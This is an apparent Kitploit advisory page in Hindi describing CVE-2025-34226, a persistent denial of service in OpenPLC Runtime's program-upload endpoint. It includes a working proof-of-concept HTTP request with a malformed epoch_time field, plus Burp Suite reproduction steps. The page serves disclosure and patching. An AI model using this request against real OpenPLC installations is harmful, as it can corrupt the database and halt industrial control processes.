Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-34226 — OpenPLC Runtime को /upload-program-action एंडपॉइंट में एक स्थायी सेवा अस्वीकार (DoS) भेद्यता का सामना करना पड़ता है। | Kitploit
उपकरण/GitHubGitHub/eyodav/cve-2025-34226
भेद्यता विश्लेषणशोषणSCADA/ICS सुरक्षावेब एप्लिकेशन शोषणगलत कॉन्फ़िगरेशनडेटाबेस सुरक्षा
GitHubeyodav/cve-2025-34226

CVE-2025-34226

OpenPLC Runtime को /upload-program-action एंडपॉइंट में एक स्थायी सेवा अस्वीकार (DoS) भेद्यता का सामना करना पड़ता है।

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-34226: OpenPLC रनटाइम में लगातार DoS

भेद्यता अवलोकन

क्षेत्रमान
CVE आईडीCVE-2025-34226
प्रभावित करता हैOpenPLC रनटाइम V3
इसमें ठीक किया गया(कमिट) 095ee09623dd229b64ad3a1db38a901a3772f6fc
गंभीरताउच्च
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N 7.1 (उच्च)
CWECWE-664 संसाधन के जीवनकाल के माध्यम से अनुचित नियंत्रण, CWE-20 अनुचित इनपुट सत्यापन

कार्यकारी सारांश

OpenPLC रनटाइम /upload-program-action एंडपॉइंट में लगातार सेवा अस्वीकार (DoS) भेद्यता से ग्रस्त है। प्रोग्राम अपलोड के दौरान epoch_time पैरामीटर को संशोधित करके, एक निम्न-विशेषाधिकार प्रमाणित उपयोगकर्ता बैकएंड डेटाबेस को भ्रष्ट कर सकता है। यह भ्रष्टाचार शुरू में महत्वपूर्ण पृष्ठों को अक्षम करता है और अंततः पूरे रनटाइम को शुरू होने से रोकता है, प्रभावी रूप से एप्लिकेशन को तब तक अनुपयोगी बना देता है जब तक इसे पुनः स्थापित नहीं किया जाता।


सुरक्षा प्रभाव

  • लगातार DoS – एक बार ट्रिगर होने पर, सिस्टम पूर्ण पुनर्स्थापना के बिना ठीक नहीं हो सकता।
  • डेटाबेस भ्रष्टाचार – शोषण OpenPLC के SQLite डेटाबेस में अमान्य मान प्रस्तुत करता है, रनटाइम स्थिति को तोड़ता है।
  • परिचालन व्यवधान – ICS/OT संदर्भों में, यह PLC-प्रबंधित प्रक्रियाओं के डाउनटाइम का कारण बन सकता है।
  • सत्यापनों का बायपास – शोषण इनपुट सत्यापन को बायपास करता है, महत्वपूर्ण मापदंडों के लिए स्वच्छता की कमी दर्शाता है।

तकनीकी विवरण

प्रभावित संस्करण

  • कमजोर संस्करण: OpenPLC रनटाइम ≤ v3 (नवीनतम संस्करण नहीं)
  • पैच किया गया संस्करण: कमिट 095ee09623dd229b64ad3a1db38a901a3772f6fc द्वारा सुधारा गया

हमला वेक्टर

/upload-program-action एंडपॉइट एक फ़ील्ड epoch_time स्वीकार करता है जो बिना सत्यापन के सीधे डेटाबेस में लिखा जाता है। जब इस फ़ील्ड को एक क्राफ्टेड या अर्थहीन मान (जैसे 1758627838 या विकृत डेटा) पर सेट किया जाता है, तो OpenPLC एक असंगत स्थिति संग्रहीत करता है। रनटाइम पुनः लोड या रिबूट पर, एप्लिकेशन भ्रष्ट पंक्ति को क्वेरी करता है और एक NoneType ऑब्जेक्ट → घातक क्रैश (TypeError: 'NoneType' object is not subscriptable) का सामना करता है।


प्रमाण की अवधारणा

PoC 1: दुर्भावनापूर्ण अपलोड अनुरोध (Burp Suite Repeater)

root@kitploit:~
POST /upload-program-action HTTP/1.1
Host: TARGET:8080
Content-Type: multipart/form-data; boundary=----BOUNDARY
Cookie: session=[valid-session-cookie]

------BOUNDARY
Content-Disposition: form-data; name="prog_name"

test
------BOUNDARY
Content-Disposition: form-data; name="prog_descr"

test
------BOUNDARY
Content-Disposition: form-data; name="prog_file"; filename="demo.st"
Content-Type: text/plain

PROGRAM demo
END_PROGRAM
------BOUNDARY
Content-Disposition: form-data; name="epoch_time"

"Just edit here and it will work (e.g "Hello !")"
------BOUNDARY--

पुनरुत्पादन चरण

  1. Burpsuite खोलें
  2. Burpsuite ब्राउज़र खोलें
  3. OpenPLC इंटरफ़ेस पर जाएँ
  4. निम्न-विशेषाधिकार खाते से प्रमाणित करें।
  5. /programs के माध्यम से एक प्रोग्राम अपलोड करें
  6. एक यादृच्छिक नाम चुनें।
  7. Burpsuite प्रॉक्सी चालू करें
  8. अनुरोध रिपीटर पर भेजें
  9. epoch_time अनुभाग संपादित करें और मूल epoch_time के बजाय एक यादृच्छिक वर्ण जैसे "L" से बदलें।
  10. नया तैयार अनुरोध भेजें।
  11. /programs का निरीक्षण करें और आप देखेंगे कि यह अब काम नहीं कर रहा है।
  12. उसके बाद कभी-कभी जब OpenPLC पुनरारंभ होता है तो रनटाइम लॉन्च होने में विफल हो जाता है और इसके बाद OpenPLC को पुनरारंभ करना असंभव हो जाता है।

तत्काल कार्रवाइयाँ

  1. तुरंत अपग्रेड करें OpenPLC V3

संदर्भ

  • पैच/रिलीज़ नोट्स: [नवीनतम आधिकारिक रिलीज़ का लिंक]
  • भेद्यता इतिहास: [भेद्यता इतिहास लिंक]

श्रेय

द्वारा खोजा गया: Eyodav

टूल डाउनलोड करें